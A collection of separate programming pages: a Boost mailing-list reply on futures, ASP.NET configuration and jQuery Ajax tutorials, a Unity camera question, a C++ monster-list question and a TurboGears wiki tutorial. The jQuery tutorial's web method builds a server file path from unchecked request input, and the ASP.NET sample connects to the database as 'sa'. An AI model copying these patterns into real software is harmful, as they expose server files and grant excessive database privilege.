> island, IMHO. Aside from that, I don't want to limit myself to POSIX.

My POSIX permit object also works perfectly on Windows using the Windows condition variable API. And on Boost.Thread, incidentally: I patch in the Boost.Thread condition_variable implementation. That gains me the thread cancellation emulation support in Boost.Thread and makes the boost::permit<> class fairly trivial to implement.

> > > Ok. Hands down: What's the associated overhead you are talking
> > > about? Do you have exact numbers?
> >
> > I gave you exact numbers: a 13% overhead for a SHA256 round.
>
> To quote your earlier mail:
> "The best I could get it to is 17 cycles a byte, with the scheduling
> (mostly future setup and teardown) consuming 2 cycles a byte, or a
> 13% overhead which I feel is unacceptable."
>
> So which of these "mostly future setup and teardown" is related to exception
> handling? Please read from page 32 onwards.
> I was under the impression that we left the "exceptions are slow" discussion
> way behind us :/

I didn't claim that.
I claimed that the compiler can't optimise out the generation of exception-handling boilerplate in the present design of futures, and I personally find that unfortunate. The CPU will end up skipping over most of the generated opcodes, and without much overhead if it has a branch predictor, but it is still an unfortunate outcome when futures could be capable of noexcept. Then the compiler could generate just a few opcodes in an ideal case when compiling a use of a future.

With regard to the 13% overhead above, almost all of that overhead was the mandatory malloc/free cycle in present future implementations.

> <snip>
> > 1. Release BindLib based AFIO to stable branch (ETA: end of January).
> > 2. Get BindLib up to Boost quality, and submit for Boost review (ETA:
> > March/April).
>
> Just a minor very unrelated remark. I find the name "BindLib" very confusing.

The library is a toolkit for locally binding libraries into namespaces :). It means that library A can be strongly bound to vX of library B, while library C can be strongly bound to vY of library B, all in the same translation unit. This was hard to do in C++ until C++11, and it's still a non-trivial effort, though BindLib takes away a lot of the manual labour.

> > I might add that BindLib lets the library end user choose what kind
> > of future the external API of the library uses. Indeed BindLib based
> > AFIO lets you choose between std::future and boost::future, and
> > moreover you can use both configurations of AFIO in the same
> > translation unit and it "just works". I could very easily - almost
> > trivially - add support for a hpx::future in there, though AFIO by
> > design needs kernel threads because it's the only way of generating
> > parallelism in non-microkernel operating system kernels (indeed, the
> > whole point of AFIO is to abstract that detail away for end users).
>
> *shiver* I wouldn't want to maintain such a library. This sounds very
> dangerous and limiting.
> Note that both boost::future and hpx::future are far
> more capable than the current std::future, with different performance
> characteristics.

A lot of people expressed that opinion before I started BindLib: they said the result would be unmaintainable, unstable, and, by implication, that the whole idea was unwise. I thought they were wrong, and now I know they are wrong. Future implementations, indeed entire threading implementations, are quite substitutable for one another when they share a common API, and can even coexist in the same translation unit surprisingly well.

One of the unit tests for AFIO compiles a monster executable consisting of five separate builds of the full test suite, each with a differing threading, filesystem and networking library, all compiled in a single repeatedly-reincluded all-header translation unit. It takes some minutes for the compiler to generate a binary. The unit tests, effectively looped five times but with totally different underlying library dependency implementations, all pass all green.

You might think it took me a herculean effort to implement that. It actually took me about fifteen hours. People overestimate how substitutable STL threading implementations are; if your code can already accept any of the Dinkumware vs SGI vs Apple STL implementations, it's a very small additional step past that.

Niall

--
ned Productions Limited Consulting

Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2015/01/219041.php
Most programmers have used the Application object to store system-wide values. While this is a convenient storage facility, it does have a few disadvantages:

- Everything is stored as an Object data type in the Application object. This takes up more memory than a specific data type and, since you must explicitly cast the value each time you wish to use it, this can be a performance hit.
- There is no IntelliSense when retrieving or setting values in the Application object. If you are setting a value and you do not remember what you called the key of the stored value, you will need to look up the key manually by searching through your program. If you do not spell the key correctly, you will inadvertently create a new variable in the Application object.
- If you read values from the web.config file, you will need to refresh the values within the Application object yourself. There is no automatic detection of changes.

Retrieving Application Variables Using web.config

The most common method of storing application-wide settings is to place these values into the <appSettings> section of your web.config file, as shown in the following code fragment:

```xml
<appSettings>
  <add key="ConnectString" value="Server=(local);Database=Northwind;uid=sa" />
  <add key="SiteName" value="ConfigSample" />
</appSettings>
```

You can then read these values during the Application_Start event by using the following code:

```vb
Sub Application_Start(ByVal sender As Object, _
                      ByVal e As EventArgs)
    Application("ConnectString") = System.Configuration. _
        ConfigurationSettings.AppSettings("ConnectString")
    Application("SiteName") = System.Configuration. _
        ConfigurationSettings.AppSettings("SiteName")
End Sub
```

To retrieve the values, you would write code like the following:

```vb
Private Sub Page_Load(ByVal sender As System.Object, _
                      ByVal e As System.EventArgs) Handles MyBase.Load
    lblAppSiteName.Text = Application("SiteName").ToString
    lblAppConnectString.Text = _
        Application("ConnectString").ToString
End Sub
```

The values SiteName and ConnectString that you pass to the Application object are not verified until runtime. This means that if you misspell "SiteName" as "SileName," you will not notice the error until runtime. This type of error can be very hard to track down. In addition, you must apply the ToString method to convert the object within the Application object to a string. If you store any other data type within the Application object, you need to call CType() or use the Convert class and one of its appropriate methods. This means more typing and more time spent performing conversions.

Creating a Configuration Class

There is a better mechanism for reading values from the web.config file. This mechanism takes advantage of ASP.NET's ability to call any class you specify to read values from the web.config file. You do this by using settings within the web.config file. There are many benefits to using this class: you get an IntelliSense-aware list of properties for each value you specify, each property has a specific data type, and, finally, if any values have changed in the web.config file, the values are automatically refreshed.

- Create a <configSections> element in the web.config file.
- Add a <section> element with some attributes that describe the name of your configuration class and where it is located.
- Add your own <config> element with your own user-defined keys and values to read.
- Create a class that implements the IConfigurationSectionHandler interface.
- Write the appropriate implementation of the Create method in your class.
- Create an initialization method to be called from the Application_Start event in Global.asax.
- Add a call to an initialization method in your class from the Application_Start event procedure in Global.asax.
- Add properties that correspond to each of the keys and values you created in your configuration section in web.config.

After you have done these steps, it is a simple matter of adding properties to the class that correspond to the various keys that you create in your <config> element.

Changing the web.config File

The first step is to create a <configSections> element in the web.config file. You may add one or more of your own <config> sections, depending on how you might want to categorize your settings. Follow the steps below to create a sample project that demonstrates how to create a configuration class that can dynamically reload values.

- Create a new ASP.NET Web Application project in Visual Studio .NET. Set the name to ConfigSample.
- Open web.config and add the XML, shown in Listing 1, immediately below the <configuration> tag.

In the <configSections> element, add a <section> tag to define the name of the next element. In this example, it is called AppConfig. This means that you will create another section with the <AppConfig> element somewhere in the web.config file. In addition, you need to define the full namespace and class name of the class you create to read the data from this configuration section. In this example it is called ConfigSample.AppConfig: ConfigSample is the name of this project (and thus the name of the namespace), and AppConfig is the name of the class you will create in this project to read the values from the AppConfig section. After this you add a comma and then repeat the namespace one more time. You can define as many <add key=> tags in the <AppConfig> element as you want. For each one of these tags, you will most likely create a public property to expose it from the AppConfig class.
In the example shown in Listing 1, you have two keys: ConnectString and SiteName.

Create the AppConfig Class

Now that you have the configuration section created, it is time to create the AppConfig class. There are three important items that you must do to create this class correctly. First, you must implement the interface IConfigurationSectionHandler (for more information on implementing interfaces, see ".NET Interface-based Programming" in the May/June issue of CoDe Magazine). Second, you must create an Init method. Third, you must implement the Create method from the IConfigurationSectionHandler interface. Refer to Listing 2.

The Init Method

You need to create a method within the AppConfig class to call from the Application_Start event procedure in the Global.asax page. This initializes the "AppConfig" configuration section of the web.config file. Refer to Listing 3.

Testing the Application

Now that you have created your class and set key values in your web.config file, it is time to test the application. Follow the steps below to create a user interface that displays the values from the web.config file.

- Display Webform1.aspx in design mode.
- Set the pageLayout property to FlowLayout.
- Select Table, Insert, Table from the Visual Studio .NET menu.
- Create a table with 2 rows and 2 columns.
- Click OK.
- Click into the first cell of the first row in the table and double-click on the Label control in the toolbox.
- Set the Text property of this control to Site Name.
- Click into the second cell of the first row in the table and double-click on the Label control in the toolbox.
- Set the Name property to lblSiteName.
- Set the Text property of this control to an empty value.
- Click into the first cell of the second row in the table and double-click on the Label control in the toolbox.
- Set the Text property of this control to Connect String.
- Click into the second cell of the second row in the table and double-click on the Label control in the toolbox.
- Set the Name property to lblConnect.
- Set the Text property of this control to an empty value.
- Double-click the form to display the Page_Load event procedure.
- Add the following code to the page. You can test your AppConfig class by retrieving the properties and placing them into the labels:

```vb
Private Sub Page_Load(ByVal sender As System.Object, _
                      ByVal e As System.EventArgs) Handles MyBase.Load
    lblSiteName.Text = AppConfig.SiteName
    lblConnect.Text = AppConfig.ConnectString
End Sub
```

Run the application and you should see the values you typed into the web.config file appear in the labels on the form. With the application still running, modify the values in the web.config file and click the Refresh button in your browser. After a couple of refreshes, the values should automatically update with the new values.

Summary

Creating a configuration class has a lot of benefits compared to using the Application object by itself. An IntelliSense listing of properties, automatic reloading of values when the web.config file changes, and strongly typed properties are just some of the advantages. While using this method requires a little more setup work, the payoff is well worth the effort.
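Listings 2 and 3 are referenced above but are not reproduced in this excerpt. Purely as an illustration of the pattern the article describes, a handler class following those steps might be shaped roughly like this; the member names and details below are assumptions, not the article's actual listings:

```vb
Imports System.Collections.Specialized
Imports System.Configuration
Imports System.Xml

Public Class AppConfig
    Implements IConfigurationSectionHandler

    Private Shared mSettings As NameValueCollection

    ' ASP.NET calls Create and passes in the <AppConfig> XML node.
    Public Function Create(ByVal parent As Object, _
                           ByVal configContext As Object, _
                           ByVal section As XmlNode) As Object _
                           Implements IConfigurationSectionHandler.Create
        mSettings = New NameValueCollection()
        For Each node As XmlNode In section.SelectNodes("add")
            mSettings.Add(node.Attributes("key").Value, _
                          node.Attributes("value").Value)
        Next
        Return mSettings
    End Function

    ' Called from Application_Start to force the section to be read.
    Public Shared Sub Init()
        ConfigurationSettings.GetConfig("AppConfig")
    End Sub

    Public Shared ReadOnly Property SiteName() As String
        Get
            Return mSettings("SiteName")
        End Get
    End Property

    Public Shared ReadOnly Property ConnectString() As String
        Get
            Return mSettings("ConnectString")
        End Get
    End Property
End Class
```

Because the framework re-invokes Create whenever web.config changes, typed shared properties like SiteName and ConnectString stay current without any manual refresh code.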
https://www.codemag.com/Article/0209081/ASP.NET-Creating-an-Application-Configuration-Class
The load() function provides us with a very easy way to get HTML data from the server into our application, but sometimes we need to be more flexible. By flexible, I mean getting JSON or XML data from the server. We can get that type of data from the server using the get() and post() methods.

1) Launch Visual Studio 2010. I am using the Ultimate edition, but the Express edition will do just fine. Create an ASP.NET web application and choose C# as the development language. Give your application an appropriate name.

2) We will show how to get HTML data from the server using the get() method, as we did in my other post using the load() method. Add another item to your application, an HTML page. Name it LoadHtmlFromServerGet.html. This is going to be a very simple page:

```html
<body>
  <h1>Load HTML Content from the Server using JQuery</h1>
  <br />
  <button id="niceButton">
    Click here to load HTML from the Server using the Get method!!!!
  </button>
  <div id="maindiv"></div>
</body>
```

3) Add another item to your project, an HTML page. I have named mine jqueryintro.htm. The HTML markup for my page follows:

```html
<body>
  <div>jQuery is a fast and concise JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions for rapid web development.
    <strong>jQuery is designed to change the way that you write JavaScript.</strong>
  </div>
  <div id="new">
    <p><h3>Download jQuery</h3>
    This is the recommended version of jQuery to use for your application. The code in here should be stable and usable in all modern browsers.
    </p>
  </div>
</body>
```

4) I want to load the contents of jqueryintro.htm into the "maindiv" element when the user clicks the button. I will do that by using the get() jQuery Ajax function. We will use this function to make a request to the server.
5) We have to add the following JavaScript/jQuery code to the head section of LoadHtmlFromServerGet.html:

```html
<script src="Scripts/jquery-1.4.1.min.js" type="text/javascript"></script>
<script type="text/javascript">
  $(document).ready(function () {
    $('#niceButton').click(function () {
      $.get('jqueryintro.htm', function (data) {
        $('#maindiv').html(data);
      });
    });
  });
</script>
```

This is very similar to the load() method. As you can see, the get() method does not operate on a wrapped set from a selector, so it cannot directly update the matched set. It uses a callback function to do that. View the page in the browser and click the button to get the data from the server.

8) Now let's have a look at how you can access and get data from a web service. Add a new HTML page to your application, Loadfromwebservice.htm. I will pass some parameters/data from this HTML page to a web service method and get results back. The markup for this page:

```html
<body>
  <div id="livfootballers">
    <a href="#">kenny</a>
    <a href="#">steven</a>
  </div>
  <div id="results"></div>
</body>
```

Add a folder to your project and name it "thefootballers". Inside it I have placed two .htm files. I have called the first one kenny.htm and the second one steven.htm. The content of these pages is simple HTML.

kenny.htm:

```html
<body>
  <p>
    Kenneth Mathieson "Kenny" Dalglish.....
  </p>
</body>
```

steven.htm:

```html
<body>
  <p>
    Steven Gerrard is.....
  </p>
</body>
```

The web service method, when invoked from the client, will get the data from the .htm files and incorporate it into the calling HTML page.

9) Add a new item to your application, a web service. Name it AjaxJquery.asmx. Make sure you uncomment this line of code:

```csharp
[System.Web.Script.Services.ScriptService]
```

I am going to create a new method that takes some data from the client page and then sends back data from the relevant .htm page that resides on the server.
The code for the method follows:

```csharp
[WebMethod]
public string FootBallerData()
{
    string thefootballer = this.Context.Request["footballer"];
    if (thefootballer == "")
        return string.Empty;
    string file = Server.MapPath("~/thefootballers/" + thefootballer + ".htm");
    StreamReader sr = File.OpenText(file);
    string contents = sr.ReadToEnd();
    return contents;
}
```

I am storing the data I got from the client side in a variable, then finding the .htm file based on that parameter, and finally loading the contents of that file into a variable.

10) Now we have to write some JavaScript code in our Loadfromwebservice.htm page. I will use the get and post utility methods to send data to the appropriate service method. Inside the <head> section of the page, I type the following (note that in the original post the `$.post(` call had been lost in formatting; it is restored here):

```html
<script src="Scripts/jquery-1.5.js" type="text/javascript"></script>
<script type="text/javascript">
  // get method
  $(function () {
    $('#livfootballers a').click(function (e) {
      $.get(
        'AjaxJquery.asmx/FootBallerData',
        { footballer: $(this).text() },
        function (response) {
          $('#results').html($(response).text());
        }
      );
      return false;
    });
  });

  // post method
  $(function () {
    $('#livfootballers a').click(function (e) {
      $.post(
        'AjaxJquery.asmx/FootBallerData',
        'footballer=' + $(this).text(),
        function (response) {
          $('#results').html($(response).text());
        }
      );
      return false;
    });
  });
</script>
```

Both methods work equally well; you can comment one out if you want and just use the other.

11) View the page in the browser and click the links. By doing so, you pass the web service hosted on the server a parameter (kenny or steven). Then we take the response back from the service and, using the html() method, attach the returned HTML content to the div with ID "results".

12) Let's now see how we can get different types of data from the server, not just HTML. We can get back JSON data and incorporate it into our HTML page. Add a new item to your application, a class file.
Name it Footballer.cs:

```csharp
public class Footballer
{
    public int ID { get; set; }
    public string FirstName { get; set; }
    public string LastName { get; set; }
}
```

Add a new item to your project, a web form. Name it Footballers.aspx. The code inside the Footballers.aspx.cs file follows:

```csharp
public partial class Footballers : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        Response.ContentType = "application/json";
        var footballer = new Footballer
        {
            ID = int.Parse(Request["id"]),
            FirstName = "Kenny",
            LastName = "Dalglish"
        };
        var serial = new DataContractJsonSerializer(typeof(Footballer));
        serial.WriteObject(Response.OutputStream, footballer);
    }
}
```

In the Page_Load event-handling routine, we construct an object of type Footballer in memory and then serialize the object to JSON. For the folks who do not know what JSON is and why we use it to exchange data among systems, have a look here.

Now we need to create another HTML page. Add a new page to the application; I will name it GetJSON.html. The markup for the page is very simple:

```html
<body>
  <button id="JsonButton">Click here to get Json</button>
  <div id="results"></div>
</body>
```

Inside the <head> section of GetJSON.html, I will write the following JavaScript code. I am using the getJSON method:

```html
<script type="text/javascript">
  $(document).ready(function () {
    $('#JsonButton').click(function () {
      $.getJSON('Footballers.aspx', { id: 2 }, function (data) {
        alert('ID: ' + data.ID + ' ' + data.FirstName + ' ' + data.LastName);
      });
    });
  });
</script>
```

View the page in the browser and click the button. You will pass the ID (id = 2) from the client to the server and back to the client, and the alert box will show the returned JSON object.

13) Now I would like to move on and create a simple example using the ajax() method. We can use this method when we want full control over making Ajax calls to the server. Add another web form to your application and name it GetFootballteams.aspx.
We will use the ajax() method to get the data from a web service and bring it back to the client. The markup follows:

```html
<head>
  <title>Football Teams</title>
  <script src="Scripts/jquery-1.5.js" type="text/javascript"></script>
  <style type="text/css">
    #result { display: none; }
  </style>
  <script type="text/javascript">
    $(function () {
      $('#buttonTeam').click(function () {
        $.ajax({
          type: "POST",
          url: "FootballService.asmx/GetTeams",
          data: "{}",
          contentType: "application/json; charset=utf-8",
          dataType: "json",
          success: function (response) {
            $('#result').html('')
              .append('<p>Here are the teams:</p><ul id="teamsList">');
            var teams = response.d;
            for (var i = 0; i < teams.length; i++) {
              $('#teamsList').append('<li>' + teams[i].Name +
                ' football club, resides on ' + teams[i].City +
                ' and was established on, ' + teams[i].Created + '</li>');
            }
            $('#result').css('display', 'block');
          }
        });
      });
    });
  </script>
</head>
<body>
  <h1>Football Teams</h1>
  <button type="button" id="buttonTeam">Get Teams</button>
  <div id="result"></div>
</body>
```

Let me explain what I am doing here. First, I wire up the click event to the button:

```javascript
$('#buttonTeam').click(function () { ... });
```

Then I call the GetTeams method from the service. I make a POST call to the server, and the content it sends back is JSON. Next, I append some text to the result div:

```javascript
success: function (response) {
  $('#result').html('')
    .append('<p>Here are the teams:</p><ul id="teamsList">');
  ...
}
```

Then I loop through this set of teams using the response.d property and append each item, with its respective properties, to the teamsList element I created above:

```javascript
var teams = response.d;
for (var i = 0; i < teams.length; i++) {
  $('#teamsList').append('<li>' + teams[i].Name + ' football club, resides on ' +
    teams[i].City + ' and was established on, ' + teams[i].Created + '</li>');
}
```

I am sure you can see how much more power and flexibility we have with the ajax() method.
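The list-building part of that success callback can also be exercised on its own, outside the browser. Here is a small sketch (`buildTeamList` is a made-up helper name, not part of the tutorial) that applies the same loop to a response shaped like the one the service returns:

```javascript
// Hypothetical helper mirroring the loop in the success callback:
// turn the service response ({ d: [...] }) into <li> markup.
function buildTeamList(response) {
  var teams = response.d;
  var items = [];
  for (var i = 0; i < teams.length; i++) {
    items.push('<li>' + teams[i].Name + ' football club, resides on ' +
               teams[i].City + ' and was established on, ' +
               teams[i].Created + '</li>');
  }
  return items.join('');
}

// Example: the same shape the FootballService call would hand back.
var sample = { d: [{ Name: 'Liverpool', City: 'Liverpool', Created: 1892 }] };
var html = buildTeamList(sample);
```

Separating the markup-building logic from the jQuery DOM calls like this also makes it easy to unit test without a server round-trip.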
Now we must create the web service.

14) Add another item to your project, a web service. Name it FootballService.asmx. The code inside is:

```csharp
public class FootballTeam
{
    public string Name { get; set; }
    public string City { get; set; }
    public short Created { get; set; }
}

List<FootballTeam> FootballTeams = new List<FootballTeam>
{
    new FootballTeam { Name = "Liverpool", City = "Liverpool", Created = 1892 },
    new FootballTeam { Name = "Everton", City = "Liverpool", Created = 1878 },
    new FootballTeam { Name = "Man Utd", City = "Manchester", Created = 1878 },
    new FootballTeam { Name = "Arsenal", City = "London", Created = 1886 },
    new FootballTeam { Name = "Tottenham", City = "London", Created = 1882 }
};

[WebMethod]
public List<FootballTeam> GetTeams()
{
    return FootballTeams;
}
```

It is very easy to understand what I am doing in the web service. I have a method, GetTeams, that returns a generic .NET List object, FootballTeams, to the client. Before that, I create a FootballTeam class and then instantiate the FootballTeams list.

View the page in the browser and click the button. You will get all the JSON data back from the service. Have a look at the picture below and see the JSON objects returned in the response.

Well, I am sure you will agree with me when I say that no one has any doubts about why Microsoft was so keen on incorporating/embracing the jQuery library into its products. Microsoft favors jQuery over the ASP.NET Ajax JavaScript library because of its huge power.

Hope it helps!!!!! Email me if you need the source code.

Hi, I need more examples using the Ajax get method.

Hi, I'm new to this Ajax and I'm trying to do my first example, but I'm not able to execute one example. It seems that your post is very interesting; can you please send your solution? Thanks, Joao Lopes
http://weblogs.asp.net/dotnetstories/archive/2011/09/14/using-jquery-ajax-functions-to-retrieve-data-from-the-server.aspx
I'm obviously a total newb, and I'm probably making a rookie mistake, but this one seems obviously right to me and behaves obviously wrong. I completed the brickshooter assignment and was annoyed that you could fly the camera completely out of the environment, so I modified the controller to enforce some min and max bounds in X and Y. It works solidly in Y, but in X, when I touch a bound, I get shot off into infinity. Then I noticed I had rotated the camera 180 degrees in Y earlier, and when I faced it back forward, everything worked as I expected (except I can't see the actual game =o)). So it's some sign error, and I'm thinking about cameras in 3D (or just Unity) wrong, or something. What would be the more correct way to do what I'm trying to do here?

```csharp
public class CameraController : MonoBehaviour
{
    public Transform ShotPosition;
    public Rigidbody Projectile;
    public float ShotForce = 1000f;
    public float MoveSpeed = 10f;

    private float minX = -6f;
    private float maxX = 6f;
    private float minY = 0.5f;
    private float maxY = 7f;

    void Update()
    {
        float h = Input.GetAxis("Horizontal") * Time.deltaTime * MoveSpeed;
        float v = Input.GetAxis("Vertical") * Time.deltaTime * MoveSpeed;

        float x = transform.position.x + h;
        float y = transform.position.y + v;
        x = Mathf.Min(x, maxX);
        x = Mathf.Max(x, minX);
        y = Mathf.Min(y, maxY);
        y = Mathf.Max(y, minY);

        Vector3 moveTo = new Vector3(x, y, transform.position.z);
        transform.Translate(moveTo - transform.position);

        if (Input.GetButtonUp("Fire1"))
        {
            Rigidbody shot = Instantiate(Projectile, ShotPosition.position, ShotPosition.rotation) as Rigidbody;
            shot.AddForce(ShotPosition.forward * ShotForce);
        }
    }
}
```

Answer by aldonaletto · May 18, 2013 at 05:47 PM

Maybe the error is due to Translate: its default is local space, so the camera may go in the wrong direction when its rotation isn't zero. You could simplify your code and solve the problem by modifying it as follows:
void Update ()
{
    float h = Input.GetAxis("Horizontal") * Time.deltaTime * MoveSpeed;
    float v = Input.GetAxis("Vertical") * Time.deltaTime * MoveSpeed;

    Vector3 curPos = transform.position; // get the current position
    // calculate new position and clamp it to the limits
    curPos.x = Mathf.Clamp(curPos.x + h, minX, maxX);
    curPos.y = Mathf.Clamp(curPos.y + v, minY, maxY);
    transform.position = curPos; // update camera position

    if(Input.GetButtonUp("Fire1"))
    {
        Rigidbody shot = Instantiate(Projectile, ShotPosition.position, ShotPosition.rotation) as Rigidbody;
        shot.AddForce(ShotPosition.forward * ShotForce);
    }
}

Works great. For some reason I had it in my head that I couldn't set position directly. Great tips.
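For completeness: if Translate must stay, its Space parameter avoids the local-space behavior the answer describes. A sketch using the same variable name as above:

```csharp
// Translate defaults to Space.Self, so a camera rotated 180 degrees in Y
// moves opposite to what world-space math expects. Passing Space.World
// makes the translation ignore the camera's rotation:
transform.Translate(moveTo - transform.position, Space.World);
```

Assigning transform.position directly, as in the accepted answer, sidesteps the question entirely, which is why it is the simpler fix.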
https://answers.unity.com/questions/459042/brickshooter-tutorial-bounding-camera-movement.html
I searched the threads for help, but I'm not sure my terminology is correct. I'm a C++ hobbyist, and have a question about maintaining a list of objects, created dynamically at run time, and how to interact with those objects. I'd like to maybe use a vector, and some pointers, but I can't get it together. This is my first post. I've gotten it to work without the vector and list ideas where it just used 4 statically created class instances. I know it's a lot of code, but basically - all I want to do is maintain a vector of pointers (I think) to Monster objects created with new. I think. Any help is awesome, even a link to something or anything. I'm studying Accelerated C++ (Koenig, Moo) but it's complicated for me - the going is slow.

Here's the class:

Code:
#ifndef MONSTER_H
#define MONSTER_H

#include <string>
using namespace std;

extern int monster_number;

class Monster
{
    public:
        Monster(string n = "Unknown", int hp = 500, int ap = 1000, int spd = 1000);
        virtual ~Monster();
        void report();
        string myname();
    private:
        string name;
        int max_health;
        int cur_health;
        int atk_pwr;
        int speed;
};

#endif // MONSTER_H

Here's the class implementation:

Code:
#include "Monster.h"
#include <iostream>
using namespace std;

Monster::Monster(string n, int hp, int ap, int spd)
{
    monster_number++;
    cout << "Monster #" << monster_number << " Born!" << endl;
    name = n;
    max_health = hp;
    cur_health = hp;
    atk_pwr = ap;
    speed = spd;
    monster_pool.push_back(this); // This fails horribly
}

Monster::~Monster()
{
    cout << "Monster #" << monster_number << " Killed!"
         << endl;
    monster_number--;
}

void Monster::report()
{
    cout << endl;
    cout << "Name: " << name << endl;
    cout << " Hp: " << cur_health << "/" << max_health << endl;
    cout << " Attack Power: " << atk_pwr << " Speed: " << speed << endl;
}

string Monster::myname()
{
    return name;
}

And the main program:

Code:
#include <iostream>
#include <vector>
#include <cctype>
#include "Monster.h"
using namespace std;

int monster_number = 0;
vector<Monster> monster_pool;

int main()
{
    //vector<Monster> monster_pool;
    Monster Dragon( "Red Dragon", 5500, 450, 130 );
    Monster Goblin( "Goblin", 45, 65, 55 );
    Monster Orc( "Orc", 95, 135, 75 );
    Monster Worg( "Worg", 65, 125, 90 );
    //monster_pool.push_back(Goblin);
    //monster_pool.push_back(Orc);
    //monster_pool.push_back(Worg);

    bool Running = true;
    char choice = '?';
    while( Running )
    {
        cout << endl;
        cout << "Monster Menu" << endl;
        cout << "(S)pawn a monster" << endl;
        cout << "(K)ill a monster" << endl;
        cout << "(L)ist all monsters" << endl;
        cout << "(Q)uit" << endl;
        cout << "Choice? ";
        cin >> choice;

        switch( toupper( choice ) )
        {
            case 'S':
                cout << endl;
                cout << "Spawn Monster" << endl;
                cout << "-------------" << endl;
                cout << "(D)ragon" << endl;
                cout << "(G)oblin" << endl;
                cout << "(O)rc" << endl;
                cout << "(W)org" << endl;
                cout << "Spawn which type? ";
                // cin >> choice;
                // Monsters.spawn(choice);
                //Monster *m+monster_number;
                break;
            case 'K':
                cout << endl;
                cout << "Kill which monster?" << endl;
                cout << "-------------------" << endl;
                // Monsters.list();
                cin >> choice;
                // Monsters.kill(choice);
                break;
            case 'L':
                cout << endl;
                cout << "Monster List:" << endl;
                cout << "-------------" << endl;
                // Monsters.list();
                break;
            case 'Q':
                Running = false;
                break;
            default:
                break;
        }
    }

    cout << endl << "Ending with " << monster_number << " monsters in the wild!" << endl;
    if( monster_number == 0 )
        cout << "You killed all the monsters, hero." << endl;
    else
        cout << "I will slay them..." << endl << endl;

    return 0;
}
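For reference, here is a minimal, self-contained sketch of the pattern being asked about - a vector of pointers to heap-allocated objects, with the pool declared before the functions that use it. The likely cause of the "fails horribly" error above is that monster_pool is a vector<Monster> (not vector<Monster*>) and is declared in the main file, so Monster.cpp has no declaration in scope. All names below are simplified stand-ins, not the poster's full program:

```cpp
#include <cassert>
#include <string>
#include <vector>

// Simplified stand-in for the poster's Monster class.
struct Monster {
    std::string name;
    explicit Monster(std::string n) : name(std::move(n)) {}
};

// The pool holds pointers, so the objects themselves live on the heap
// and are not copied into the vector.
std::vector<Monster*> monster_pool;

Monster* spawn(const std::string& name) {
    Monster* m = new Monster(name);  // created dynamically at run time
    monster_pool.push_back(m);       // keep track of it in the pool
    return m;
}

void kill_monster(std::size_t index) {
    if (index < monster_pool.size()) {
        delete monster_pool[index];                        // free the object
        monster_pool.erase(monster_pool.begin() + index);  // forget the pointer
    }
}
```

With this layout, pushing `this` from the constructor also works, provided the header declares `extern std::vector<Monster*> monster_pool;` so every translation unit can see it. In modern C++, `std::vector<std::unique_ptr<Monster>>` would handle the deletes automatically.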
https://cboard.cprogramming.com/cplusplus-programming/138440-keeping-dynamic-object-list-referencing-them.html
TurboGears has a minimum of required configuration. It does need to know where your database lives if you're not using sqlite. If you are using sqlite, the database is configured by default and you don't need to do anything. If you're not, the configuration is quite simple. The quickstart command has created two config files, one for 'dev'elopment and one for 'prod'uction. The config files are more-or-less the same format as the .ini files used by windows apps; check the configuration reference for a full listing of configuration options and settings, and see the database installation documentation for information on how to install alternative database support and set up the connection.

Since we are doing development, load up dev.cfg in your favorite editor, uncomment the sqlalchemy.dburi line that corresponds to your database and modify the values to match your environment. You'll also want to comment out the sqlite line. You'll also probably want to create a new database so that our wiki tables don't muck up one of your other projects. With all that done, restart the web server by hitting Control-C and running the startup script again:

python start-wiki20.py

From here on, you'll only have to restart the server when you make a change to the configuration. When in development mode, CherryPy detects when you save a file in your project and automatically reloads itself with the new code. This may take a few seconds, so if you're quick about saving, flipping to your browser, and reloading, you can get a "server not found" error in your browser.

Since we've created, in Python code, the schema for our simple database and we've also told TurboGears where to look for the database, we're ready to actually create our tables:

tg-admin sql create

This command searches through your model and creates all the tables currently missing from the database.
For our Page model, this will result in the following SQL being executed on the database:

CREATE TABLE page (
    pagename VARCHAR(30) NOT NULL,
    data VARCHAR,
    PRIMARY KEY (pagename)
)

Hard to believe it, but we're already ready to start displaying pages. The first step is to rename our template. welcome.html just won't do. Rename the template using whatever commands do the trick for your operating system:

cd wiki20/templates
mv welcome.html page.html
cd ../..

Now, let's replace the body of the template with something more reasonable for a wiki page:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
      xmlns:py="http://genshi.edgewall.org/"
      xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="master.html" />
<head>
    <meta content="text/html; charset=utf-8" http-equiv="content-type" py:replace="''"/>
    <title>
        ${page.pagename} - 20 Minute Wiki
    </title>
</head>
<body>
    <div class="main_content">
        <div style="float:right; width: 10em">
            Viewing <span py:replace="page.pagename">Page Name Goes Here</span>
            <br/>
            You can return to the <a href="/">FrontPage</a>.
        </div>
        <div py:replace="Markup(data)">Page text goes here.</div>
    </div>
</body>
</html>

Notice that you can open the page.html file directly in your web browser, and it is still perfectly viewable. It also doesn't add wonky directive markers, so it'll pass cleanly through most current WYSIWYG editors. This can be convenient when you're working with others who insist on using such editors.

This template is using two Genshi replacement methods. The first is the expression substitution syntax ${var}. The Python code inside (yes, real Python code, not some weird template language) is evaluated and the result replaces the expression. The second is the py:replace attribute, which replaces the tag and its placeholder contents with the result of the expression. Both these will escape the results to ensure you produce valid HTML. The Markup() function tells Genshi not to escape the contents of the data variable.

So, where do these page and data variables come from? Both are items in the dictionary returned by your controller. Or they will be when we add them...
TurboGears greatly reduces the amount of boilerplate code you need to write, but it does not eliminate it. We need to hook up our Page class in our model and the template we just created. This is done in your controller, which is found in wiki20/controllers.py. We'll replace the old index method with one that does something more interesting than grabbing the current time.

from turbogears import controllers, expose, flash
from turbogears import redirect, url
from wiki20.model import Page
from docutils.core import publish_parts

class Root(controllers.RootController):
    @expose('wiki20.templates.page')                                        #1
    def index(self, pagename='FrontPage'):                                  #2
        page = Page.query.get(pagename)                                     #3
        content = publish_parts(page.data, writer_name='html')['html_body'] #4
        return dict(data=content, page=page)                                #5

